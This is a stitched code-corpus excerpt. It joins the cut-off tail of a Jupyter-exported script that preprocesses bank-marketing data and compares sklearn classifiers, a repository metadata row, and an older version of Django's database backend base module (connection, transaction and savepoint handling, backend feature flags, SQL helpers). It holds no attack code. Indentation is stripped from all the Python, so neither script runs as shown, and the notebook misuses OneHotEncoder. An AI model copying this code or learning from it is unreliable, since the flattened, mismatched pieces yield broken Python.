data.loc[ (data['age'] > 49) & (data['age'] <= 59), 'age'] = 4
data.loc[ (data['age'] > 59 )& (data['age'] <= 69), 'age'] = 5
# In[17]:
data.drop('age_slice',axis=1,inplace=True)
# In[18]:
data['marital'].replace(['divorced' ,'married' , 'unknown' , 'single'] ,['single','married','unknown','single'], inplace=True)
# In[19]:
data['marital']=le.fit_transform(data['marital'])
# In[20]:
data
# In[21]:
data['job'].replace(['student'] ,['unemployed'], inplace=True)
# In[22]:
data[['education', 'y']].groupby(['education'], as_index=False).mean().sort_values(by='education', ascending=True)
# In[23]:
fig, ax = plt.subplots()
fig.set_size_inches(20, 5)
sns.countplot(x = 'education', hue = 'loan', data = data)
ax.set_xlabel('Education', fontsize=15)
ax.set_ylabel('y', fontsize=15)
ax.set_title('Education Count Distribution', fontsize=15)
ax.tick_params(labelsize=15)
sns.despine()
# In[24]:
fig, ax = plt.subplots()
fig.set_size_inches(20, 5)
sns.countplot(x = 'job', hue = 'loan', data = data)
ax.set_xlabel('job', fontsize=17)
ax.set_ylabel('y', fontsize=17)
ax.set_title('Education Count Distribution', fontsize=17)
ax.tick_params(labelsize=17)
sns.despine()
# In[25]:
data['education'].replace(['basic.4y','basic.6y','basic.9y','professional.course'] ,['not_reach_highschool','not_reach_highschool','not_reach_highschool','university.degree'], inplace=True)
# In[26]:
ohe=OneHotEncoder()
data['default']=le.fit_transform(data['default'])
data['housing']=le.fit_transform(data['housing'])
data['loan']=le.fit_transform(data['loan'])
data['month']=le.fit_transform(data['month'])
ohe=OneHotEncoder(categorical_features=data['month'])
data['contact']=le.fit_transform(data['contact'])
data['day_of_week']=le.fit_transform(data['day_of_week'])
data['job']=le.fit_transform(data['job'])
data['education']=le.fit_transform(data['education'])
# In[27]:
cat=data.select_dtypes(include=['object']).columns
cat
# In[28]:
def outlier_detect(data,feature):
q1 = data[feature].quantile(0.25)
q3 = data[feature].quantile(0.75)
iqr = q3-q1 #Interquartile range
lower = q1-1.5*iqr
upper = q3+1.5*iqr
data = data.loc[(data[feature] > lower) & (data[feature] < upper)]
print('lower IQR and upper IQR of',feature,"are:", lower, 'and', upper, 'respectively')
return data
# In[29]:
data.columns
# In[30]:
data['pdays'].unique()
# In[31]:
data['pdays'].replace([999] ,[0], inplace=True)
# In[32]:
data['previous'].unique()
# In[33]:
fig, ax = plt.subplots()
fig.set_size_inches(15, 5)
sns.countplot(x = 'campaign', palette="rocket", data = data)
ax.set_xlabel('campaign', fontsize=25)
ax.set_ylabel('y', fontsize=25)
ax.set_title('campaign', fontsize=25)
sns.despine()
# In[34]:
sns.countplot(x = 'pdays', palette="rocket", data = data)
ax.set_xlabel('pdays', fontsize=25)
ax.set_ylabel('y', fontsize=25)
ax.set_title('pdays', fontsize=25)
sns.despine()
# In[35]:
data[['pdays', 'y']].groupby(['pdays'], as_index=False).mean().sort_values(by='pdays', ascending=True)
# In[36]:
sns.countplot(x = 'emp.var.rate', palette="rocket", data = data)
ax.set_xlabel('emp.var.rate', fontsize=25)
ax.set_ylabel('y', fontsize=25)
ax.set_title('emp.var.rate', fontsize=25)
sns.despine()
# In[37]:
# outlier_detect returns the filtered frame, so the result must be assigned back
data = outlier_detect(data,'duration')
#data = outlier_detect(data,'emp.var.rate')
data = outlier_detect(data,'nr.employed')
#data = outlier_detect(data,'euribor3m')
# In[38]:
X = data.iloc[:,:-1]
X = X.values
y = data['y'].values
# In[39]:
from sklearn.linear_model import LogisticRegression
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
# In[40]:
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
# In[ ]:
algo = {'LR': LogisticRegression(),
'DT':DecisionTreeClassifier(),
'RFC':RandomForestClassifier(n_estimators=100),
'SVM':SVC(gamma=0.01),
'KNN':KNeighborsClassifier(n_neighbors=10)
}
for k, v in algo.items():
model = v
model.fit(X_train, y_train)
print('Acurracy of ' + k + ' is {0:.2f}'.format(model.score(X_test, y_test)*100))
| 17.505882 | 189 | 0.650034 |
c5f650d5037432ec5ef77039c7d48e2ef47367d3 | 51,601 | py | Python | django/db/backends/__init__.py | anoopksh/django | f00243f36df8dfe504491e03be5d5aea076340b3 | [
"BSD-3-Clause"
] | 1 | 2019-09-21T06:40:37.000Z | 2019-09-21T06:40:37.000Z | django/db/backends/__init__.py | anoopksh/django | f00243f36df8dfe504491e03be5d5aea076340b3 | [
"BSD-3-Clause"
] | null | null | null | django/db/backends/__init__.py | anoopksh/django | f00243f36df8dfe504491e03be5d5aea076340b3 | [
"BSD-3-Clause"
] | null | null | null | import datetime
import time
try:
from django.utils.six.moves import _thread as thread
except ImportError:
from django.utils.six.moves import _dummy_thread as thread
from collections import namedtuple
from contextlib import contextmanager
from importlib import import_module
from django.conf import settings
from django.db import DEFAULT_DB_ALIAS
from django.db.backends.signals import connection_created
from django.db.backends import utils
from django.db.transaction import TransactionManagementError
from django.db.utils import DatabaseError, DatabaseErrorWrapper, ProgrammingError
from django.utils.functional import cached_property
from django.utils import six
from django.utils import timezone
class BaseDatabaseWrapper(object):
"""
Represents a database connection.
"""
ops = None
vendor = 'unknown'
def __init__(self, settings_dict, alias=DEFAULT_DB_ALIAS,
allow_thread_sharing=False):
# `settings_dict` should be a dictionary containing keys such as
# NAME, USER, etc. It's called `settings_dict` instead of `settings`
# to disambiguate it from Django settings modules.
self.connection = None
self.queries = []
self.settings_dict = settings_dict
self.alias = alias
self.use_debug_cursor = None
# Savepoint management related attributes
self.savepoint_state = 0
# Transaction management related attributes
self.autocommit = False
self.transaction_state = []
# Tracks if the connection is believed to be in transaction. This is
# set somewhat aggressively, as the DBAPI doesn't make it easy to
# deduce if the connection is in transaction or not.
self._dirty = False
# Tracks if the connection is in a transaction managed by 'atomic'.
self.in_atomic_block = False
# List of savepoints created by 'atomic'
self.savepoint_ids = []
# Tracks if the outermost 'atomic' block should commit on exit,
# ie. if autocommit was active on entry.
self.commit_on_exit = True
# Tracks if the transaction should be rolled back to the next
# available savepoint because of an exception in an inner block.
self.needs_rollback = False
# Connection termination related attributes
self.close_at = None
self.errors_occurred = False
# Thread-safety related attributes
self.allow_thread_sharing = allow_thread_sharing
self._thread_ident = thread.get_ident()
def __eq__(self, other):
if isinstance(other, BaseDatabaseWrapper):
return self.alias == other.alias
return NotImplemented
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(self.alias)
##### Backend-specific methods for creating connections and cursors #####
def get_connection_params(self):
"""Returns a dict of parameters suitable for get_new_connection."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_connection_params() method')
def get_new_connection(self, conn_params):
"""Opens a connection to the database."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a get_new_connection() method')
def init_connection_state(self):
"""Initializes the database connection settings."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an init_connection_state() method')
def create_cursor(self):
"""Creates a cursor. Assumes that a connection is established."""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a create_cursor() method')
##### Backend-specific methods for creating connections #####
def connect(self):
"""Connects to the database. Assumes that the connection is closed."""
# In case the previous connection was closed while in an atomic block
self.in_atomic_block = False
self.savepoint_ids = []
# Reset parameters defining when to close the connection
max_age = self.settings_dict['CONN_MAX_AGE']
self.close_at = None if max_age is None else time.time() + max_age
self.errors_occurred = False
# Establish the connection
conn_params = self.get_connection_params()
self.connection = self.get_new_connection(conn_params)
self.init_connection_state()
if self.settings_dict['AUTOCOMMIT']:
self.set_autocommit(True)
connection_created.send(sender=self.__class__, connection=self)
def ensure_connection(self):
"""
Guarantees that a connection to the database is established.
"""
if self.connection is None:
with self.wrap_database_errors:
self.connect()
##### Backend-specific wrappers for PEP-249 connection methods #####
def _cursor(self):
self.ensure_connection()
with self.wrap_database_errors:
return self.create_cursor()
def _commit(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.commit()
def _rollback(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.rollback()
def _close(self):
if self.connection is not None:
with self.wrap_database_errors:
return self.connection.close()
##### Generic wrappers for PEP-249 connection methods #####
def cursor(self):
"""
Creates a cursor, opening a connection if necessary.
"""
self.validate_thread_sharing()
if (self.use_debug_cursor or
(self.use_debug_cursor is None and settings.DEBUG)):
cursor = self.make_debug_cursor(self._cursor())
else:
cursor = utils.CursorWrapper(self._cursor(), self)
return cursor
def commit(self):
"""
Commits a transaction and resets the dirty flag.
"""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._commit()
self.set_clean()
def rollback(self):
"""
Rolls back a transaction and resets the dirty flag.
"""
self.validate_thread_sharing()
self.validate_no_atomic_block()
self._rollback()
self.set_clean()
def close(self):
"""
Closes the connection to the database.
"""
self.validate_thread_sharing()
# Don't call validate_no_atomic_block() to avoid making it difficult
# to get rid of a connection in an invalid state. The next connect()
# will reset the transaction state anyway.
try:
self._close()
finally:
self.connection = None
self.set_clean()
##### Backend-specific savepoint management methods #####
def _savepoint(self, sid):
self.cursor().execute(self.ops.savepoint_create_sql(sid))
def _savepoint_rollback(self, sid):
self.cursor().execute(self.ops.savepoint_rollback_sql(sid))
def _savepoint_commit(self, sid):
self.cursor().execute(self.ops.savepoint_commit_sql(sid))
def _savepoint_allowed(self):
# Savepoints cannot be created outside a transaction
return self.features.uses_savepoints and not self.get_autocommit()
##### Generic savepoint management methods #####
def savepoint(self):
"""
Creates a savepoint inside the current transaction. Returns an
identifier for the savepoint that will be used for the subsequent
rollback or commit. Does nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
thread_ident = thread.get_ident()
tid = str(thread_ident).replace('-', '')
self.savepoint_state += 1
sid = "s%s_x%d" % (tid, self.savepoint_state)
self.validate_thread_sharing()
self._savepoint(sid)
return sid
def savepoint_rollback(self, sid):
"""
Rolls back to a savepoint. Does nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_rollback(sid)
def savepoint_commit(self, sid):
"""
Releases a savepoint. Does nothing if savepoints are not supported.
"""
if not self._savepoint_allowed():
return
self.validate_thread_sharing()
self._savepoint_commit(sid)
def clean_savepoints(self):
"""
Resets the counter used to generate unique savepoint ids in this thread.
"""
self.savepoint_state = 0
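    # Illustrative usage sketch (not part of the original Django source):
    #
    #     sid = connection.savepoint()
    #     try:
    #         ...  # statements that might need to be undone
    #     except DatabaseError:
    #         connection.savepoint_rollback(sid)
    #     else:
    #         connection.savepoint_commit(sid)
    #
    # Here `connection` is any BaseDatabaseWrapper instance; all three calls
    # silently do nothing when savepoints are unsupported or autocommit is on.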
##### Backend-specific transaction management methods #####
def _set_autocommit(self, autocommit):
"""
Backend-specific implementation to enable or disable autocommit.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _set_autocommit() method')
##### Generic transaction management methods #####
def enter_transaction_management(self, managed=True, forced=False):
"""
Enters transaction management for a running thread. It must be balanced with
the appropriate leave_transaction_management call, since the actual state is
managed as a stack.
The state and dirty flag are carried over from the surrounding block or
from the settings, if there is no surrounding block (dirty is always false
when no current block is running).
If you switch off transaction management and there is a pending
        commit/rollback, the data will be committed, unless "forced" is True.
"""
self.validate_no_atomic_block()
self.transaction_state.append(managed)
if not managed and self.is_dirty() and not forced:
self.commit()
self.set_clean()
if managed == self.get_autocommit():
self.set_autocommit(not managed)
def leave_transaction_management(self):
"""
Leaves transaction management for a running thread. A dirty flag is carried
over to the surrounding block, as a commit will commit all changes, even
those from outside. (Commits are on connection level.)
"""
self.validate_no_atomic_block()
if self.transaction_state:
del self.transaction_state[-1]
else:
raise TransactionManagementError(
"This code isn't under transaction management")
if self.transaction_state:
managed = self.transaction_state[-1]
else:
managed = not self.settings_dict['AUTOCOMMIT']
if self._dirty:
self.rollback()
if managed == self.get_autocommit():
self.set_autocommit(not managed)
raise TransactionManagementError(
"Transaction managed block ended with pending COMMIT/ROLLBACK")
if managed == self.get_autocommit():
self.set_autocommit(not managed)
def get_autocommit(self):
"""
Check the autocommit state.
"""
self.ensure_connection()
return self.autocommit
def set_autocommit(self, autocommit):
"""
Enable or disable autocommit.
"""
self.validate_no_atomic_block()
self.ensure_connection()
self._set_autocommit(autocommit)
self.autocommit = autocommit
def get_rollback(self):
"""
Get the "needs rollback" flag -- for *advanced use* only.
"""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
return self.needs_rollback
def set_rollback(self, rollback):
"""
Set or unset the "needs rollback" flag -- for *advanced use* only.
"""
if not self.in_atomic_block:
raise TransactionManagementError(
"The rollback flag doesn't work outside of an 'atomic' block.")
self.needs_rollback = rollback
def validate_no_atomic_block(self):
"""
Raise an error if an atomic block is active.
"""
if self.in_atomic_block:
raise TransactionManagementError(
"This is forbidden when an 'atomic' block is active.")
def validate_no_broken_transaction(self):
if self.needs_rollback:
raise TransactionManagementError(
"An error occurred in the current transaction. You can't "
"execute queries until the end of the 'atomic' block.")
def abort(self):
"""
Roll back any ongoing transaction and clean the transaction state
stack.
"""
if self._dirty:
self.rollback()
while self.transaction_state:
self.leave_transaction_management()
def is_dirty(self):
"""
Returns True if the current transaction requires a commit for changes to
happen.
"""
return self._dirty
def set_dirty(self):
"""
        Sets a dirty flag for the current thread and code streak. This can be
        used in a managed block of code to decide whether there are open
        changes waiting for commit.
"""
if not self.get_autocommit():
self._dirty = True
def set_clean(self):
"""
        Resets a dirty flag for the current thread and code streak. This can be
        used in a managed block of code to decide whether a commit or rollback
        should happen.
"""
self._dirty = False
self.clean_savepoints()
##### Foreign key constraints checks handling #####
@contextmanager
def constraint_checks_disabled(self):
"""
Context manager that disables foreign key constraint checking.
"""
disabled = self.disable_constraint_checking()
try:
yield
finally:
if disabled:
self.enable_constraint_checking()
def disable_constraint_checking(self):
"""
Backends can implement as needed to temporarily disable foreign key
constraint checking. Should return True if the constraints were
disabled and will need to be reenabled.
"""
return False
def enable_constraint_checking(self):
"""
Backends can implement as needed to re-enable foreign key constraint
checking.
"""
pass
def check_constraints(self, table_names=None):
"""
Backends can override this method if they can apply constraint
checking (e.g. via "SET CONSTRAINTS ALL IMMEDIATE"). Should raise an
IntegrityError if any invalid foreign key references are encountered.
"""
pass
##### Connection termination handling #####
def is_usable(self):
"""
Tests if the database connection is usable.
This function may assume that self.connection is not None.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require an is_usable() method')
def close_if_unusable_or_obsolete(self):
"""
Closes the current connection if unrecoverable errors have occurred,
or if it outlived its maximum age.
"""
if self.connection is not None:
# If the application didn't restore the original autocommit setting,
# don't take chances, drop the connection.
if self.get_autocommit() != self.settings_dict['AUTOCOMMIT']:
self.close()
return
if self.errors_occurred:
if self.is_usable():
self.errors_occurred = False
else:
self.close()
return
if self.close_at is not None and time.time() >= self.close_at:
self.close()
return
##### Thread safety handling #####
def validate_thread_sharing(self):
"""
        Validates that the connection isn't accessed by a thread other than the
        one which originally created it, unless the connection was explicitly
authorized to be shared between threads (via the `allow_thread_sharing`
property). Raises an exception if the validation fails.
"""
if not (self.allow_thread_sharing
or self._thread_ident == thread.get_ident()):
raise DatabaseError("DatabaseWrapper objects created in a "
"thread can only be used in that same thread. The object "
"with alias '%s' was created in thread id %s and this is "
"thread id %s."
% (self.alias, self._thread_ident, thread.get_ident()))
##### Miscellaneous #####
@cached_property
def wrap_database_errors(self):
"""
Context manager and decorator that re-throws backend-specific database
exceptions using Django's common wrappers.
"""
return DatabaseErrorWrapper(self)
def make_debug_cursor(self, cursor):
"""
Creates a cursor that logs all queries in self.queries.
"""
return utils.CursorDebugWrapper(cursor, self)
@contextmanager
def temporary_connection(self):
"""
Context manager that ensures that a connection is established, and
if it opened one, closes it to avoid leaving a dangling connection.
This is useful for operations outside of the request-response cycle.
Provides a cursor: with self.temporary_connection() as cursor: ...
"""
must_close = self.connection is None
cursor = self.cursor()
try:
yield cursor
finally:
cursor.close()
if must_close:
self.close()
def _start_transaction_under_autocommit(self):
"""
Only required when autocommits_when_autocommit_is_off = True.
"""
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a _start_transaction_under_autocommit() method')
def schema_editor(self, *args, **kwargs):
"Returns a new instance of this backend's SchemaEditor"
raise NotImplementedError('subclasses of BaseDatabaseWrapper may require a schema_editor() method')
class BaseDatabaseFeatures(object):
allows_group_by_pk = False
# True if django.db.backend.utils.typecast_timestamp is used on values
# returned from dates() calls.
needs_datetime_string_cast = True
empty_fetchmany_value = []
update_can_self_select = True
# Does the backend distinguish between '' and None?
interprets_empty_strings_as_nulls = False
# Does the backend allow inserting duplicate rows when a unique_together
# constraint exists, but one of the unique_together columns is NULL?
ignores_nulls_in_unique_constraints = True
can_use_chunked_reads = True
can_return_id_from_insert = False
has_bulk_insert = False
uses_savepoints = False
can_combine_inserts_with_and_without_auto_increment_pk = False
# If True, don't use integer foreign keys referring to, e.g., positive
# integer primary keys.
related_fields_match_type = False
allow_sliced_subqueries = True
has_select_for_update = False
has_select_for_update_nowait = False
supports_select_related = True
# Does the default test database allow multiple connections?
# Usually an indication that the test database is in-memory
test_db_allows_multiple_connections = True
# Can an object be saved without an explicit primary key?
supports_unspecified_pk = False
# Can a fixture contain forward references? i.e., are
# FK constraints checked at the end of transaction, or
# at the end of each save operation?
supports_forward_references = True
# Does a dirty transaction need to be rolled back
# before the cursor can be used again?
requires_rollback_on_dirty_transaction = False
# Does the backend allow very long model names without error?
supports_long_model_names = True
# Is there a REAL datatype in addition to floats/doubles?
has_real_datatype = False
supports_subqueries_in_group_by = True
supports_bitwise_or = True
# Do time/datetime fields have microsecond precision?
supports_microsecond_precision = True
# Does the __regex lookup support backreferencing and grouping?
supports_regex_backreferencing = True
# Can date/datetime lookups be performed using a string?
supports_date_lookup_using_string = True
# Can datetimes with timezones be used?
supports_timezones = True
# Does the database have a copy of the zoneinfo database?
has_zoneinfo_database = True
# When performing a GROUP BY, is an ORDER BY NULL required
# to remove any ordering?
requires_explicit_null_ordering_when_grouping = False
# Does the backend order NULL values as largest or smallest?
nulls_order_largest = False
# Is there a 1000 item limit on query parameters?
supports_1000_query_parameters = True
# Can an object have a primary key of 0? MySQL says No.
allows_primary_key_0 = True
# Do we need to NULL a ForeignKey out, or can the constraint check be
# deferred
can_defer_constraint_checks = False
# date_interval_sql can properly handle mixed Date/DateTime fields and timedeltas
supports_mixed_date_datetime_comparisons = True
# Does the backend support tablespaces? Default to False because it isn't
# in the SQL standard.
supports_tablespaces = False
# Does the backend reset sequences between tests?
supports_sequence_reset = True
# Confirm support for introspected foreign keys
# Every database can do this reliably, except MySQL,
# which can't do it for MyISAM tables
can_introspect_foreign_keys = True
# Can the backend introspect an AutoField, instead of an IntegerField?
can_introspect_autofield = False
# Support for the DISTINCT ON clause
can_distinct_on_fields = False
# Does the backend decide to commit before SAVEPOINT statements
# when autocommit is disabled? http://bugs.python.org/issue8145#msg109965
autocommits_when_autocommit_is_off = False
# Does the backend prevent running SQL queries in broken transactions?
atomic_transactions = True
# Can we roll back DDL in a transaction?
can_rollback_ddl = False
# Can we issue more than one ALTER COLUMN clause in an ALTER TABLE?
supports_combined_alters = False
# What's the maximum length for index names?
max_index_name_length = 63
# Does it support foreign keys?
supports_foreign_keys = True
# Does it support CHECK constraints?
supports_check_constraints = True
# Does the backend support 'pyformat' style ("... %(name)s ...", {'name': value})
# parameter passing? Note this can be provided by the backend even if not
# supported by the Python driver
supports_paramstyle_pyformat = True
# Does the backend require literal defaults, rather than parameterised ones?
requires_literal_defaults = False
# Does the backend require a connection reset after each material schema change?
connection_persists_old_columns = False
# What kind of error does the backend throw when accessing closed cursor?
closed_cursor_error_class = ProgrammingError
def __init__(self, connection):
self.connection = connection
@cached_property
def supports_transactions(self):
"Confirm support for transactions"
try:
# Make sure to run inside a managed transaction block,
            # otherwise autocommit will cause the confirmation to
# fail.
self.connection.enter_transaction_management()
cursor = self.connection.cursor()
cursor.execute('CREATE TABLE ROLLBACK_TEST (X INT)')
self.connection.commit()
cursor.execute('INSERT INTO ROLLBACK_TEST (X) VALUES (8)')
self.connection.rollback()
cursor.execute('SELECT COUNT(X) FROM ROLLBACK_TEST')
count, = cursor.fetchone()
cursor.execute('DROP TABLE ROLLBACK_TEST')
self.connection.commit()
finally:
self.connection.leave_transaction_management()
return count == 0
@cached_property
def supports_stddev(self):
"Confirm support for STDDEV and related stats functions"
class StdDevPop(object):
sql_function = 'STDDEV_POP'
try:
self.connection.ops.check_aggregate_support(StdDevPop())
return True
except NotImplementedError:
return False
class BaseDatabaseOperations(object):
"""
This class encapsulates all backend-specific differences, such as the way
a backend performs ordering or calculates the ID of a recently-inserted
row.
"""
compiler_module = "django.db.models.sql.compiler"
def __init__(self, connection):
self.connection = connection
self._cache = None
def autoinc_sql(self, table, column):
"""
Returns any SQL needed to support auto-incrementing primary keys, or
None if no SQL is necessary.
This SQL is executed when a table is created.
"""
return None
def bulk_batch_size(self, fields, objs):
"""
Returns the maximum allowed batch size for the backend. The fields
are the fields going to be inserted in the batch, the objs contains
all the objects to be inserted.
"""
return len(objs)
def cache_key_culling_sql(self):
"""
Returns an SQL query that retrieves the first cache key greater than the
n smallest.
This is used by the 'db' cache backend to determine where to start
culling.
"""
return "SELECT cache_key FROM %s ORDER BY cache_key LIMIT 1 OFFSET %%s"
def date_extract_sql(self, lookup_type, field_name):
"""
Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
extracts a value from the given date field field_name.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a date_extract_sql() method')
def date_interval_sql(self, sql, connector, timedelta):
"""
Implements the date interval functionality for expressions
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a date_interval_sql() method')
def date_trunc_sql(self, lookup_type, field_name):
"""
Given a lookup_type of 'year', 'month' or 'day', returns the SQL that
truncates the given date field field_name to a date object with only
the given specificity.
"""
        raise NotImplementedError('subclasses of BaseDatabaseOperations may require a date_trunc_sql() method')
def datetime_cast_sql(self):
"""
Returns the SQL necessary to cast a datetime value so that it will be
retrieved as a Python datetime object instead of a string.
This SQL should include a '%s' in place of the field's name.
"""
return "%s"
def datetime_extract_sql(self, lookup_type, field_name, tzname):
"""
Given a lookup_type of 'year', 'month', 'day', 'hour', 'minute' or
'second', returns the SQL that extracts a value from the given
datetime field field_name, and a tuple of parameters.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a datetime_extract_sql() method')
def datetime_trunc_sql(self, lookup_type, field_name, tzname):
"""
Given a lookup_type of 'year', 'month', 'day', 'hour', 'minute' or
'second', returns the SQL that truncates the given datetime field
field_name to a datetime object with only the given specificity, and
a tuple of parameters.
"""
        raise NotImplementedError('subclasses of BaseDatabaseOperations may require a datetime_trunc_sql() method')
def deferrable_sql(self):
"""
Returns the SQL necessary to make a constraint "initially deferred"
during a CREATE TABLE statement.
"""
return ''
def distinct_sql(self, fields):
"""
Returns an SQL DISTINCT clause which removes duplicate rows from the
result set. If any fields are given, only the given fields are being
checked for duplicates.
"""
if fields:
raise NotImplementedError('DISTINCT ON fields is not supported by this database backend')
else:
return 'DISTINCT'
def drop_foreignkey_sql(self):
"""
Returns the SQL command that drops a foreign key.
"""
return "DROP CONSTRAINT"
def drop_sequence_sql(self, table):
"""
Returns any SQL necessary to drop the sequence for the given table.
Returns None if no SQL is necessary.
"""
return None
def fetch_returned_insert_id(self, cursor):
"""
Given a cursor object that has just performed an INSERT...RETURNING
statement into a table that has an auto-incrementing ID, returns the
newly created ID.
"""
return cursor.fetchone()[0]
def field_cast_sql(self, db_type, internal_type):
"""
Given a column type (e.g. 'BLOB', 'VARCHAR'), and an internal type
(e.g. 'GenericIPAddressField'), returns the SQL necessary to cast it
before using it in a WHERE statement. Note that the resulting string
should contain a '%s' placeholder for the column being searched against.
"""
return '%s'
def force_no_ordering(self):
"""
Returns a list used in the "ORDER BY" clause to force no ordering at
all. Returning an empty list means that nothing will be included in the
ordering.
"""
return []
def for_update_sql(self, nowait=False):
"""
Returns the FOR UPDATE SQL clause to lock rows for an update operation.
"""
if nowait:
return 'FOR UPDATE NOWAIT'
else:
return 'FOR UPDATE'
def fulltext_search_sql(self, field_name):
"""
Returns the SQL WHERE clause to use in order to perform a full-text
search of the given field_name. Note that the resulting string should
contain a '%s' placeholder for the value being searched against.
"""
raise NotImplementedError('Full-text search is not implemented for this database backend')
def last_executed_query(self, cursor, sql, params):
"""
Returns a string of the query last executed by the given cursor, with
placeholders replaced with actual values.
`sql` is the raw query containing placeholders, and `params` is the
sequence of parameters. These are used by default, but this method
exists for database backends to provide a better implementation
according to their own quoting schemes.
"""
from django.utils.encoding import force_text
# Convert params to contain Unicode values.
to_unicode = lambda s: force_text(s, strings_only=True, errors='replace')
if isinstance(params, (list, tuple)):
u_params = tuple(to_unicode(val) for val in params)
elif params is None:
u_params = ()
else:
u_params = dict((to_unicode(k), to_unicode(v)) for k, v in params.items())
return six.text_type("QUERY = %r - PARAMS = %r") % (sql, u_params)
def last_insert_id(self, cursor, table_name, pk_name):
"""
Given a cursor object that has just performed an INSERT statement into
a table that has an auto-incrementing ID, returns the newly created ID.
This method also receives the table name and the name of the primary-key
column.
"""
return cursor.lastrowid
def lookup_cast(self, lookup_type):
"""
Returns the string to use in a query when performing lookups
("contains", "like", etc). The resulting string should contain a '%s'
placeholder for the column being searched against.
"""
return "%s"
def max_in_list_size(self):
"""
Returns the maximum number of items that can be passed in a single 'IN'
list condition, or None if the backend does not impose a limit.
"""
return None
def max_name_length(self):
"""
Returns the maximum length of table and column names, or None if there
is no limit.
"""
return None
def no_limit_value(self):
"""
Returns the value to use for the LIMIT when we are wanting "LIMIT
infinity". Returns None if the limit clause can be omitted in this case.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a no_limit_value() method')
def pk_default_value(self):
"""
Returns the value to use during an INSERT statement to specify that
the field should use its default value.
"""
return 'DEFAULT'
def process_clob(self, value):
"""
Returns the value of a CLOB column, for backends that return a locator
object that requires additional processing.
"""
return value
def return_insert_id(self):
"""
For backends that support returning the last insert ID as part
of an insert query, this method returns the SQL and params to
append to the INSERT query. The returned fragment should
contain a format string to hold the appropriate column.
"""
pass
def compiler(self, compiler_name):
"""
Returns the SQLCompiler class corresponding to the given name,
in the namespace corresponding to the `compiler_module` attribute
on this backend.
"""
if self._cache is None:
self._cache = import_module(self.compiler_module)
return getattr(self._cache, compiler_name)
def quote_name(self, name):
"""
Returns a quoted version of the given table, index or column name. Does
not quote the given name if it's already been quoted.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a quote_name() method')
def quote_parameter(self, value):
"""
Returns a quoted version of the value so it's safe to use in an SQL
string. This should NOT be used to prepare SQL statements to send to
the database; it is meant for outputting SQL statements to a file
or the console for later execution by a developer/DBA.
"""
raise NotImplementedError()
def random_function_sql(self):
"""
Returns an SQL expression that returns a random value.
"""
return 'RANDOM()'
def regex_lookup(self, lookup_type):
"""
Returns the string to use in a query when performing regular expression
lookups (using "regex" or "iregex"). The resulting string should
contain a '%s' placeholder for the column being searched against.
If the feature is not supported (or part of it is not supported), a
NotImplementedError exception can be raised.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations may require a regex_lookup() method')
def savepoint_create_sql(self, sid):
"""
Returns the SQL for starting a new savepoint. Only required if the
"uses_savepoints" feature is True. The "sid" parameter is a string
for the savepoint id.
"""
return "SAVEPOINT %s" % self.quote_name(sid)
def savepoint_commit_sql(self, sid):
"""
Returns the SQL for committing the given savepoint.
"""
return "RELEASE SAVEPOINT %s" % self.quote_name(sid)
def savepoint_rollback_sql(self, sid):
"""
Returns the SQL for rolling back the given savepoint.
"""
return "ROLLBACK TO SAVEPOINT %s" % self.quote_name(sid)
def set_time_zone_sql(self):
"""
Returns the SQL that will set the connection's time zone.
Returns '' if the backend doesn't support time zones.
"""
return ''
def sql_flush(self, style, tables, sequences, allow_cascade=False):
"""
Returns a list of SQL statements required to remove all data from
the given database tables (without actually removing the tables
themselves).
The returned value also includes SQL statements required to reset DB
sequences passed in :param sequences:.
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
The `allow_cascade` argument determines whether truncation may cascade
to tables with foreign keys pointing the tables being truncated.
PostgreSQL requires a cascade even if these tables are empty.
"""
raise NotImplementedError('subclasses of BaseDatabaseOperations must provide a sql_flush() method')
def sequence_reset_by_name_sql(self, style, sequences):
"""
Returns a list of the SQL statements required to reset sequences
passed in :param sequences:.
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
"""
return []
def sequence_reset_sql(self, style, model_list):
"""
Returns a list of the SQL statements required to reset sequences for
the given models.
The `style` argument is a Style object as returned by either
color_style() or no_style() in django.core.management.color.
"""
return [] # No sequence reset required by default.
def start_transaction_sql(self):
"""
Returns the SQL statement required to start a transaction.
"""
return "BEGIN;"
def end_transaction_sql(self, success=True):
"""
Returns the SQL statement required to end a transaction.
"""
if not success:
return "ROLLBACK;"
return "COMMIT;"
def tablespace_sql(self, tablespace, inline=False):
"""
Returns the SQL that will be used in a query to define the tablespace.
Returns '' if the backend doesn't support tablespaces.
If inline is True, the SQL is appended to a row; otherwise it's appended
to the entire CREATE TABLE or CREATE INDEX statement.
"""
return ''
def prep_for_like_query(self, x):
"""Prepares a value for use in a LIKE query."""
from django.utils.encoding import force_text
return force_text(x).replace("\\", "\\\\").replace("%", "\%").replace("_", "\_")
# Same as prep_for_like_query(), but called for "iexact" matches, which
# need not necessarily be implemented using "LIKE" in the backend.
prep_for_iexact_query = prep_for_like_query
def validate_autopk_value(self, value):
"""
Certain backends do not accept some values for "serial" fields
(for example zero in MySQL). This method will raise a ValueError
if the value is invalid, otherwise returns validated value.
"""
return value
